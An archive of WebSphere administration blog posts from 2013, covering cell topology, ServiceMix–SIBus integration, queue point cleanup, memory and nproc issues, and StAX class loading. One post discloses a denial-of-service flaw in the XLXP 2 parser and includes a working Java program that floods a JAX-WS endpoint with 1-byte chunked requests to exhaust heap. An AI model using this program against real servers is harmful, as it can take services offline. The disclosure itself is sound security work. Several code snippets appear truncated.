Monday, November 4, 2013

How to divide a WebSphere topology into cells

A WebSphere cell is a logical grouping of nodes (each of which runs one or more application servers) that are centrally managed:

  • There is a single configuration repository for the entire cell. Each individual node receives a read-only copy of the part of the configuration relevant for that node.
  • There is a single administrative console for the entire cell. This console is hosted on the deployment manager and allows to manage the configuration repository as well as the runtime state of all WebSphere instances in the cell.
  • The MBean servers in the cell are federated. By connecting to the deployment manager, one can interact with any MBean on any WebSphere instance in the cell.

One of the primary tasks when designing a WebSphere topology is to decide how WebSphere instances should be grouped into cells. There is no golden rule, and this generally requires a tradeoff between multiple considerations:

  1. Applications deployed on different clusters can easily communicate over JMS if the clusters are in the same cell. The reason is that SIBuses are cell scoped resources and that each WebSphere instance in a cell has information about the topology of the cell, so that it can easily locate the messaging engine to connect to. This means that making two applications in the same cell interact with each other over JMS only requires minimal configuration, even if they are deployed on different clusters. On the other hand, doing this for applications deployed in different cells requires more configuration because WebSphere instances in one cell are not aware of the messaging topology in the other cell.

  2. Setting up remote EJB calls over IIOP between applications deployed on different clusters is easier if the clusters are in the same cell: the applications don't need to make any particular provisions to support this, and no additional configuration is required on the server. In that case, making two applications interact over IIOP only requires using a special JNDI name (such as cell/clusters/cluster1/ejb/SomeEJB) that routes the requests to the right target cluster. On the other hand, doing this for applications deployed in different cells requires additional configuration:

    • A foreign cell binding needs to be created between the cells.
    • For cells where security is enabled, it is also required to establish trust between these cells, i.e. to exchange the SSL certificates and to synchronize the LTPA keys.
    • Routing and workload management for IIOP works better inside a cell (actually inside a core group, but there is generally a single core group for the entire cell), because the application server that hosts the calling application knows about the runtime state of the members of the target cluster. To get the same quality of service for IIOP calls between different cells it is necessary to set up core group bridges between the core groups in these cells, and the complexity of the bridge configuration is O(N2), where N is the number of cells involved.
  3. Applications are defined at cell scope and then mapped to target servers and clusters. This implies that application names must be unique in a cell and that it is not possible to deploy multiple versions of the same application under the same name. Deploying multiple versions of the same application therefore requires renaming that application (by changing the value of the display-name element in the application.xml descriptor). Note that this works well for J2EE applications, but not for SCA modules deployed on WebSphere Process Server or ESB. The reason is that during the deployment of an SCA modules, WebSphere automatically creates SIBus resources with names that depend on the original application name. In this case, changing application.xml is not enough.

  4. A single Web server instance can be used as a reverse proxy for multiple clusters. However, WebSphere can only maintain the plug-in configuration automatically if the Web server and the clusters are all part of the same cell. Using a single Web server for multiple clusters in different cells is possible but additional procedures are required to maintain that configuration. This means that the larger the cells are, the more flexibility one has for the Web server configuration.

  5. One possible strategy to upgrade WebSphere environments to a new major version is to migrate the configuration as is using the tools (WASPreUpgrade and WASPostUpgrade) provided by IBM. The first step in this process is always to migrate the deployment manager profile. WebSphere supports mixed version cells (as long as the deployment manager has the highest version), so that the individual nodes can be migrated one by one later. Larger cells slightly reduce the amount of work required during an upgrade (because there are fewer deployment managers), but at the price of increased risk: if something unexpected happens during the migration of the deployment manager, the impact will be larger and more difficult to manage.

  6. Some configurations are done at the cell level. This includes e.g. the security configuration (although that configuration can be overridden at the server level). Having larger cells reduces the amount of work required to apply and maintain these configurations.

  7. There are good reasons to use separate cells for products that augment WebSphere Application Server (such as WebSphere Process Server), although technically it is possible to mix different products in the same cell:

    • The current releases of these products is not necessarily based on the latest WebSphere Application Server release. Since the deployment manager must be upgraded first, this may block the upgrade to a newer WebSphere Application Server release.
    • Typically, upgrades of products such as WPS are considerably more complex than WAS upgrades. If both products are mixed in a single cell, then this may slow down the adoption of new WAS versions.

Some of these arguments are in favor of larger cells, while others are in favor of smaller cells. There is no single argument that can be used to determine the cell topology and one always has to do a tradeoff between multiple considerations. There are however two rules that should always apply:

  • A cell should never span multiple environments (development, acceptance, production, etc.).
  • There is a document from IBM titled Best Practices for Large WebSphere Application Server Topologies that indicates that a (single cell) topology is considered large if it contains dozens of nodes with hundreds of application servers. Most organizations are far away from these numbers, so that in practice one can usually consider that there is no upper limit on the number of application servers in a cell.

Sunday, November 3, 2013

Integrating ServiceMix with WebSphere's SIBus

This article describes how to integrate Apache ServiceMix with WebSphere's SIBus. More precisely we will explore how to deploy a Camel route that sends messages to a SIBus destination in WebSphere. We assume that connection factories and queue objects are created using the API described in the Programming to use JMS and messaging directly page in the WebSphere infocenter instead of looking them up using JNDI. This makes the configuration considerably simpler because there is no need to create JNDI objects in the WebSphere configuration.

In this scenario, it's enough to install the SIB thin client and we don't need the EJB thin client and IBM ORB (as would be the case in a scenario that uses JNDI lookups). The SIB thin client can be found in the runtimes directory of the WebSphere installation. It is actually packaged as an OSGi bundle that can be deployed out of the box in ServiceMix. This has been successfully tested with the client from WAS and Note that earlier 8.5 versions seem to have some issues because they actually require the EJB thin client and IBM ORB.

To deploy the SIB thin client, simply use the following command in the ServiceMix console (Adapt the path and version as necessary):

osgi:install -s file:///opt/IBM/WebSphere/AppServer/runtimes/

The thin client should then appear in the list of deployed bundles as follows (Use the osgi:list command to display that list):

[ 182] [Active     ] [            ] [       ] [   80] IBM SIB JMS Thin Client (8.5.0)

We can now create and deploy a Camel route. We will do that using a Spring context file. As mentioned earlier, the necessary connection factory and queue objects will be created using the API. Since Spring supports creating beans using static and instance factory methods (including factory methods with parameters) this can be done entirely in the Spring configuration without writing any code.

The following sample configuration sets up a Camel route that reads files from a directory and sends them to a SIBus destination:

<beans xmlns=""

  <camelContext xmlns="">
      <from uri="file://test"/>
      <to uri="sib:queue:testQ"/>
  <bean id="jmsFactoryFactory" class=""
  <bean id="testQ"
        factory-bean="jmsFactoryFactory" factory-method="createQueue">
  <bean id="testCF" factory-bean="jmsFactoryFactory" factory-method="createConnectionFactory">
    <property name="busName" value="test"/>
    <property name="providerEndpoints" value="isis:7276:BootstrapBasicMessaging"/>
    <property name="targetTransportChain" value="InboundBasicMessaging"/>
  <bean id="sib" class="org.apache.camel.component.jms.JmsComponent">
    <property name="connectionFactory" ref="testCF"/>
    <property name="destinationResolver">
      <bean class=""/>

To run this sample, change the queue name, bus name and the provider endpoint as required by your environment. Then copy the Spring context to the deploy directory in your ServiceMix installation. This should create a test directory where you can put the files to be sent to the SIBus destination.

Thursday, October 31, 2013

How to get rid of SIBus queue points in state DELETE_PENDING

Sometimes, when deleting a destination from a SIBus, the corresponding queue point is not deleted from the underlying messaging engine, but remains in state DELETE_PENDING. This manifests itself in three ways:

  1. The queue point is still visible in the runtime view of the messaging engine in the admin console. To see this, go to the admin console page for the messaging engine, switch to the "Runtime" tab and then click on "Queue points".

  2. The MBean for the queue point is still registered by the messaging engine. The state attribute of that MBean will have value DELETE_PENDING.

  3. Each time the messaging engine is started, the following message appears in the logs:

    CWSIP0063I: The local destination <name> with UUID <uuid> has been marked for deletion.

It is not exactly clear under which conditions this issue occurs, but apparently it has to do with the existence of remote queue points, i.e. with the production or consumption of messages through a remote messaging engine.

To clean up these queue points and eliminate the recurring CWSIP0063I messages, use the following wsadmin script:

objName = AdminControl.makeObjectName('WebSphere:type=SIBQueuePoint,*')
queuepoints = AdminControl.queryNames_jmx(objName, None)
for queuepoint in queuepoints:
    name = queuepoint.getKeyProperty("name")
    if (not name.startswith("_") and AdminControl.invoke_jmx(queuepoint, 'getState', [], []) == 'DELETE_PENDING'):
        print 'Found SIBQueuePoint in state DELETE_PENDING: ' + name
        irs = AdminControl.invoke_jmx(queuepoint, 'listInboundReceivers', [], [])
        for ir in irs:
            AdminControl.invoke_jmx(queuepoint, 'flush', [ir], [''])
            print 'Called flush on SIBQueuePoint for inbound receiver: ' + name
        cts = AdminControl.invoke_jmx(queuepoint, 'listRemoteConsumerTransmitters', [], [])
        for ct in cts:
            AdminControl.invoke_jmx(queuepoint, 'flush', [ct], [''])
            print 'Called flush on SIBQueuePoint for remote consumer transmitter: ' + name


  • The flush operations used by the script are actually deprecated, but it the documentation doesn't specify which operations should be used instead.
  • The script may fail because the queue may already be deleted after the flush of the SIBInboundReceiver objects. In that case subsequent operations fail because the MBean no longer exist. As a workaround, simply reexecute the script.

Sunday, October 27, 2013

Heap starvation on WebSphere Process Server 6.1 caused by internal cache

Some time ago we had an incident where both members of a WebSphere Process Server 6.1 cluster encountered a heap starvation and needed to be restarted:

That incident occurred after one of the external service providers we connect to reported a problem causing an increase in response time.

Analysis of a heap dump taken before the restart of the WPS servers showed that a large amount of heap (480MB of 1.4GB) is consumed by objects of type$OperationHandlerList. That appears to be an internal data structure used by SCA Web service imports (We are running lots of SCA modules on that cluster). A closer look at OperationHandlerList reveals that this class acts as a cache for objects of type, which is WebSphere's implementation of the javax.xml.rpc.Call API.

In fact, Call objects are used during the invocation of an operation on an SCA import with Web service binding, but they are both stateful and costly to create. To avoid this cost, WPS uses a caching mechanism that takes into account the stateful nature of these objects. Basically, OperationHandlerList appears to be designed as a pool of Call objects that is initially empty and that has a hardcoded maximum size of 100 entries. When an SCA import is invoked, WPS will attempt to retrieve an existing Call object from the pool or create a new one if none is available. After the completion of the invocation, WPS then puts the instance (back) to the pool for later reuse.

What is important to understand is that there is a separate pool (i.e. a separate OperationHandlerList instance) for each operation defined by each SCA Web service import. In addition, entries in these pools are never expunged. From the explanations given in the previous paragraph it is easy to see that the number of Call objects stored in a given OperationHandlerList instance is therefore equal to the maximum concurrency reached (since the start of the server) for invocations of the corresponding operation. That explains why the heap consumed by these pools may increase sharply after a performance problem with one of the Web services consumed by WPS: in general, a degraded response time of a service provider will cause an increase in concurrency because clients continue to send requests to WPS. That also explains why the memory is never released and the issue has the same symptoms as a memory leak.

As indicated above, there is a separate pool for each operation. This means that there may be a large number of these pools in a given WPS instance. However, this is usually not what causes the problem. The issue may already occur if there is only a limited number of operations for which the maximum concurrency increases. The reason is that an individual Call object may consume a significant amount of memory. E.g. in our case, we found one OperationHandlerList instance (that had reached its maximum capacity of 100 entries) that accounted for 177MB of used heap alone.

Note: At first glance, the issue described in this post seems to match APAR JR35210. However, that APAR simply describes the problem as a memory leak without giving precise information about the conditions that trigger the issue, except that it relates the issue to the usage of dynamic endpoints. However, our findings indicate that the issue is not (necessarily) related to dynamic endpoints. JR35210 may therefore be a different (but related) issue.

Saturday, October 26, 2013

WebSphere problems related to new default nproc limit in RHEL 6

We recently had an incident on one of our production systems running under Red Hat Enterprise Linux where under certain load conditions WebSphere Application Server would fail with an OutOfMemoryError with the following message:

Failed to create a thread: retVal -1073741830, errno 11

Error number 11 corresponds to EAGAIN and indicates that the C library function creating the thread fails because of insufficient resources. Often this is related to native memory starvation, but in our case it turned out that it was the nproc limit that was reached. That limit puts an upper bound on the number of processes a given user can create. It may affect WebSphere because in this context, Linux counts each thread as a distinct process.

Starting with RHEL 6, the soft nproc limit is set to 1024 by default, while in previous releases this was not the case. The corresponding configuration can be found in /etc/security/limits.d/90-nproc.conf. Generally a WebSphere instance only uses a few hundred of threads so that this problem may go unnoticed for some time before being triggered by an unusual load condition. You should also take into account that the limit applies to the sum of all threads created by all processes running with the same user as the WebSphere instance. In particular it is not unusual to have IBM HTTP Server running with the same user on the same host. Since the WebSphere plug-in uses a multithreaded processing model (and not an synchronous one), the nproc limit may be reached if the number of concurrent requests increases too much.

One solution is to remove or edit the 90-nproc.conf file to increase the nproc limit for all users. However, since the purpose of the new default value in RHEL 6 is to prevent accidental fork bombs, it may be better to define new hard and soft nproc limits only for the user running the WebSphere instance. While this is easy to configure, there is one other problem that needs to be taken into account.

For some unknown reasons, sudo (in contrast to su) is unable to set the soft limit for the new process to a value larger than the hard limit set on the parent process. If that occurs, instead of failing, sudo creates the new process with the same soft limit as the parent process. This means that if the hard nproc limit for normal users is lower than the soft nproc limit of the WebSphere user and an administrator uses sudo to start a WebSphere instance, then that instance will not have the expected soft nproc limit. To avoid this problem, you should do the following:

  • Increase the soft nproc limit for the user running WebSphere.
  • Increase the hard nproc for all users to the same (or a higher) value, keeping the soft limit unchanged (to avoid accidental fork bombs).

Note that you can verify that the limits are set correctly for a running WebSphere instance by determining the PID of the instance and checking the /proc/<pid>/limits file.

Wednesday, October 16, 2013

Quote of the day

The United States of America is prepared to use all elements of our power, including military force, to secure our core interests in the region. We will confront external aggression against our allies and partners, as we did in the Gulf War. We will ensure the free flow of energy from the region to the world. Although America is steadily reducing our own dependence on imported oil, the world still depends on the region’s energy supply, and a severe disruption could destabilize the entire global economy.

Barak Obama, Address to the United Nations General Assembly 2013.

I guess no other US president ever openly expressed the imperialist nature of american foreign policy that clearly...

Friday, October 11, 2013

Broken by design: WebSphere's default StAX implementation (part 1)

Recently I came across an issue in WebSphere's default StAX implementation (XLXP 2) where the parser unexpectedly consumed a huge amount of heap. The issue was triggered by a gzipped XML file containing a base64 encoded PDF document with several megabytes of content. A test showed that although the size of the XML document was of order of 10 MB, XLXP 2 required almost 1 GB of heap to parse the document (without any additional processing). That is of course totally unexpected: for large documents, an XML parser should never require an amount of heap 100 times as large as the size of the XML document.

After investigating the issue (with the XLXP 2 version in WAS, it turned out that the problem with IBM's parser is caused by the combination of three things:

  • Irrespective of the value of the property (XMLInputFactory.IS_COALESCING), the parser will always return a text node in the input document as a single CHARACTERS event (where the precise meaning of "text node" is a sequence of CharData and/or Reference tokens neither preceded nor followed by a CharData or Reference token).

    For readers who are not experts in the StAX specification, this requires some additional explanations. With respect to coalescing, the only requirement stipulated by StAX (which is notoriously underspecified) is that enabling coalescing mode "requires the processor to coalesce adjacent character data". There are two interpretations of this requirement:

    • The first one is that this requirement is simply related to how CDATA sections are processed. If coalescing is enabled, then CDATA sections nodes are implicitly converted to text nodes and merged with adjacent text nodes. In non coalescing mode, CDATA sections are reported as distinct events, such that there is one and only one event for each text node and CDATA section in the input document. This interpretation corresponds to the definition of coalescing used by DOM (see DocumentBuilderFactory#setCoalescing()).
    • The second interpretation goes a step further and assumes that in non coalescing mode, the parser should handle text nodes in a way similar to SAX, i.e. split text nodes that are larger than parser's input buffer into chunks. In this case, a text node is reported as one or more CHARACTERS events. This allows the parser to process text nodes of arbitrary length with constant memory.

    BEA's original reference implementation and XLXP 2 are based on the first interpretation, while SJSXP (the StAX implementation in Oracle's JRE) and Woodstox use the second interpretation. Note that for applications using StAX, this doesn't really make any difference because an application using a StAX parser in non coalescing mode must be written such that it is able to correctly process any sequence of CHARACTERS and CDATA events.

  • XLXP 2 uses a separate buffer for each read operation on the underlying input stream, i.e. for each read operation, the parser will either allocate a new buffer or recycle a previously created buffer that is no longer in use. That is the case even if the previous read operation didn't fill the buffer completely: XLXP 2 will not attempt to read data into the buffer used during the previous read operation. By default, the size of each buffer is 64 KB.

  • When processing character data, the buffers containing the corresponding (encoded) data from the underlying stream remain in use (i.e. cannot be recycled) until the data has been reported back to the application. Note that this is a design choice: the parser could as well have been designed to accumulate the decoded character data in an intermediary buffer and immediately release the original buffers.

This has two consequences:

  • When processing a text node from the input document, all buffers containing chunks of data for that text node remain in use until the parser reaches the end of the text node.
  • If the read operations on the underlying input stream return less than the requested number of bytes (i.e. the buffer size), then these buffers will only be partially filled.

This means that processing a text node may require much more memory than one would expect based on the length of that text node. Since the default buffer size is 64 KB, in the extreme case (where each read operation on the input stream returns a single byte), the parser may need 65536 times more memory than the length of the text node. In the case I came across, the XML document contained a text node of around 9 million characters and the input stream was a GZIPInputStream which returned more or less 600 bytes per read operation. A simple calculation shows that XLXP 2 will require of order of 900 MB of heap to process that text node.

IBM's reaction to this was that XLXP 2 is "working as designed" (!) and that the issue can be mitigated with the help of two system properties:
Obviously, this system property specifies the size of the buffers described earlier. Setting it to a smaller value than the default 65536 bytes will reduce the amount of unused space. On the other hand, if the value is too small, then this will obviously have an impact on performance. Note that the fact that this parameter is specified as a system property is especially unfortunate, because it will affect all applications running on a given WebSphere instance.
This property was introduced by APAR PM42465 and is related to pooling of XMLStreamReader objects, not buffers. Therefore it has no impact on the problem described here.

However, it should be clear by now that adjusting these system property doesn't eliminate the problem completely, unless one uses an unreasonable small buffer size. This raises another interesting question: considering that WebSphere's JAX-WS implementation relies on StAX and that XLXP 2 may under certain circumstances allocate an amount of heap that is several order of magnitudes larger than the message size, isn't that a vector for a denial-of-service attack? If it's possible to construct a request that tricks XLXP 2 into reading multiple small chunks from the incoming SOAP message, couldn't this be used to trigger an OOM error on the target application server?

It turns out that unfortunately this is indeed possible. The attack takes advantage of the fact that when WebSphere receives a POST request that uses the chunked transfer encoding, the Web container will deliver each chunk separately to the application. If the request is dispatched to a JAX-WS endpoint this means that each chunk is delivered individually to the StAX parser, which is exactly the attack vector we are looking for. To exploit this vulnerability, one simply has to construct a SOAP message with a moderately large text node (let's say 10000 characters) and send that message to a JAX-WS endpoint using 1-byte chunks (at least for the part containing the text node). To process that text node, XLXP 2 will have to allocate 10000 buffers, each one 64 KB in size (assuming that the default configuration is used), which means that more than 600 MB of heap are required.

The following small Java program can be used to test if a particular (JAX-WS endpoint on a given) WebSphere instance is vulnerable:

public class XLXP2DoS {
  private static final String CHARSET = "utf-8";
  public static void main(String[] args) throws Exception {
    String host = "localhost";
    int port = 9080;
    String path = "/myapp/myendpoint";
    Socket socket = new Socket(host, port);
    OutputStream out = socket.getOutputStream();
    out.write(("POST " + path + " HTTP/1.1\r\n"
        + "Host: " + host + ":" + port + "\r\n"
        + "Content-Type: text/xml; charset=" + CHARSET + "\r\n"
        + "Transfer-Encoding: chunked\r\n"
        + "SOAP-Action: \"\"\r\n\r\n").getBytes("ascii"));
    writeChunk(out, "<s:Envelope xmlns:s=''>"
        + "<s:Header><p:dummy xmlns:p='urn:dummy'>");
    for (int i=0; i<10000; i++) {
      writeChunk(out, "A");
    writeChunk(out, "</p:dummy></s:Header><s:Body/></s:Envelope>");
  private static void writeChunk(OutputStream out, String data) throws IOException {
    out.write((Integer.toHexString(data.length()) + "\r\n").getBytes("ascii"));

The vulnerability has some features that make it rather dangerous:

  • Since the amount of heap used is several order of magnitudes larger than the message size, it is generally possible to carry out this attack even against application servers with a maximum POST request size configured in the HTTP transport channel settings.
  • An HTTP server in front of the application server doesn't protect against the attack. The reason is that the WebSphere plug-in forwards the chunks unmodified to the target server. The same will be true for most types of load balancers. For reverse proxies other than IBM HTTP Server this may or may not be true. On the other hand, a security gateway (such as DataPower) or an ESB will likely protect against this attack.
  • Since the request is relatively small, it will be difficult to distinguish from other requests and to trace back to its source.

One possible way to fix this vulnerability is to use another StAX implementation, as described in a previous post. In fact, switching the StAX implementation for a given Java EE application also changes the StAX implementation used to process SOAP messages for JAX-WS endpoints exposed by that application. Since WebSphere's JAX-WS implementation is based on Apache Axis2 and Apache Axiom, and the recommended StAX implementation for Axiom is Woodstox, that particular StAX implementation may be the best choice. Note that this may still have some unexpected side effects. In particular, XLXP 2 is known to implement some optimizations that are designed to work together with the JAXB 2 implementation in WebSphere. Obviously these optimizations will no longer work if XLXP 2 is replaced by Woodstox. It is also not clear if using WebSphere's JAX-WS implementation with a non-IBM StAX implementation is supported by IBM, i.e. if you will get help if there is an interoperability issue.

Update: IBM finally acknowledged that there is an issue with XLXP 2 (although they avoided qualifying it as a security issue). See the second part of this article for a discussion about the "fix" IBM applied to solve the issue.

Wednesday, October 2, 2013

Broken by design: changing the StAX implementation in a JEE application on WebSphere

To change the StAX implementation used in a Java EE application it should normally be enough to simply add the JAR with the third party StAX implementation (such as Woodstox) to the application. E.g. if the application is a simple Web application, then it should be enough to add the JAR to WEB-INF/lib. The same is true for the SAX, DOM and XSLT implementations. The reason is that all these APIs (which are part of JAXP) use the so called JDK 1.3 service provider discovery mechanism. That mechanism uses the thread context class loader to locate the service provider (the StAX implementation in this case). On the other hand, the Java EE specification requires that the application server sets the thread context class loader correctly before handing over a request to the application. For a servlet request, this will be the class loader of the Web module, while for a call to an EJB (packaged in an EJB-JAR), this will be the application class loader (i.e. the class loader corresponding to the EAR). That makes it possible to have different applications deployed on the same server use different StAX implementations without the need to modify these applications.

All this works as expected on most application servers, except on WebSphere. On WebSphere, even with a third party StAX implementation packaged in the application, JAXP will still return the factories (XMLInputFactory, etc.) from the StAX implementation packaged with WebSphere, at least if the application uses the default (parent first) class loader delegation mode. Note that the implementation returned by JAXP is not the StAX implementation in the JDK shipped with WebSphere (which is XLXP 1), but the one found in plugins/ (which is XLXP 2). The only way to work around this issue is to switch the delegation mode of the application or Web module to parent last (with all the difficulties that this implies on WebSphere) or to create a shared library with isolated class loader (which always uses parent last delegation mode).

In this blog post I will explain why this is so and what this tells us about the internals of WebSphere. First of all, remember that starting with version 6.1, WebSphere actually runs in an OSGi container. That is, the WebSphere runtime is actually composed of a set of OSGi bundles. These are the files that you can find in the plugins directory in the WebSphere installation, and as mentioned earlier, the StAX implementation used by WebSphere is actually packaged in one of these bundles. If you are familiar with OSGi, then you should know that each bundle has its own class loader. This raises an interesting question: how is JAXP actually able to load that StAX implementation from the thread context class loader in a Java EE application?

To answer that question, let's have a look at the class loader hierarchy of a typical Java EE application deployed on WebSphere (as seen in the class loader viewer in the admin console):

Some of the class loaders in that hierarchy are easy to identify:

  • 1 and 2 are created by the JRE. They load the classes that are required to bootstrap the OSGi container in which WebSphere runs.
  • 6 and 7 are the class loaders for the application and the (Web or EJB) module.

The interesting things actually happen in class loader number 3 (of type org.eclipse.osgi.internal.baseadaptor.DefaultClassLoader). Unfortunately there is no way to see this in the admin console, but it turns out that this is actually the class loader for one of the OSGi bundles of the WebSphere runtime, namely That bundle doesn't really contain any code, but its manifest has the following entry:

DynamicImport-Package: *

What this means is that all packages exported by all OSGi bundles are visible to the class loader of that bundle. In other words, class loader number 3 not only delegates to its parent, but it can also delegate to the class loader of any of the WebSphere OSGi bundles, including of course This is why JAXP is able to load that StAX implementation.

Note that before loading the StAX implementation, JAXP first needs to locate it. It does this by doing a lookup of the relevant META-INF/services resource (e.g. META-INF/services/ That resource request is also delegated to all OSGi bundles. It appears that class loader number 4 is somehow involved in this, but this detail is not really relevant for the present discussion. The important thing to remember is that in the class loader hierarchy of a Java EE application, there is a class loader that delegates class loading and resource requests to all OSGi bundles of the WebSphere runtime.

Obviously this particular class loader hierarchy was not designed specifically for StAX. It actually ensures that applications have access to the standard Java EE and WebSphere specific APIs contained in the WebSphere bundles.

Now it is easy to understand why it is not possible to override the StAX implementation if the application is configured with the default parent first delegation mode: the lookup of the META-INF/services resource will return the resource included in, not the one in the StAX implementation packaged with the application. This changes when switching to parent last delegation mode (either by changing the configuration of the application/module class loader or by configuring a shared library with isolated class loader): in this case, the META-INF/services resource from the third party StAX implementation is returned first.

What has been said up to now applies to Java EE applications. On the other hand, WebSphere also uses StAX internally. E.g. the SCA runtime in WebSphere uses StAX to parse certain configuration files or deployment descriptors. This raises another interesting question. The JDK 1.3 service provider discovery mechanism has been designed with J2SE and J2EE environments in mind. On the other hand, it is a well known fact that this mechanism doesn't work well in an OSGi environment. The reason is that each OSGi bundle has its own class loader and that the thread context class loader is undefined in an OSGi environment. That is why well designed OSGi based containers don't load the StAX API classes (and other APIs that use the JDK 1.3 service provider discovery mechanism) from the JRE, but from custom bundles. Here are a couple of examples of such containers together with the link to the source code of the custom StAX API bundle:

Although the details differ, these bundles share a common feature: the code is basically identical to the code in the JRE, except for the implementation of XMLEventFactory, XMLInputFactory and XMLOutputFactory. With respect to the code in the JRE, these classes are modified to use an alternate provider discovery mechanism that is compatible with OSGi.

WebSphere doesn't use this approach. There is no StAX API bundle, and both Java EE applications and the code in the WebSphere bundles use the API classes loaded from the JRE. The question is then how the JDK 1.3 service provider discovery mechanism can return the expected StAX implementation if it is triggered by code in the WebSphere runtime. Obviously, if the code in the WebSphere runtime is invoked by a Java EE application, then the thread context class loader is set as described earlier and there is no problem. The question therefore only applies to WebSphere code executed outside of the context of any Java EE application, e.g. during the server startup or during the processing of an incoming request that has not yet been dispatched to an application.

The answer is that WebSphere ensures that all threads it creates have the context class loader set by default to the we already encountered in the class loader hierarchy for a Java EE application shown above (see class loader 4). This is the case e.g. for all threads in the startup thread pool (which as the name suggests is used during server startup) and all idle Web container threads. Since that class loader can delegate to any bundle class loader, the JDK 1.3 service provider discovery mechanism will indeed be able to locate the StAX implementation in the bundle.

To summarize, the difficulties to change the StAX implementation can be traced back to the combination of two decisions made by IBM in the design of WebSphere:

  1. The decision not to use the StAX implementation in the JRE, but instead to use another StAX implementation deployed as an OSGi bundle in the WebSphere runtime. (Note that this is specific to StAX. For SAX, DOM and XSLT, WebSphere uses the default implementations in the JRE. This explains why the issue described in this post only occurs for StAX.)
  2. The decision to use the StAX API classes from the JRE and therefore to rely on the JDK 1.3 service provider discovery mechanism. If IBM had chosen to use the same design pattern as Geronimo and ServiceMix (and others), then they could have implemented a modified provider discovery mechanism that doesn't need the META-INF/services resources to locate the default StAX implementation in the bundle.

The conclusion is that the need to switch to parent last delegation mode to make this work is due to WebSphere's design. Whether one considers this as "working as designed" or "broken by design" is of course purely subjective... IBM support will of course tell you that it is working as designed and that changing the class loader delegation mode is not a workaround, but simply a requirement in order to use a third party StAX implementation. Your mileage may vary.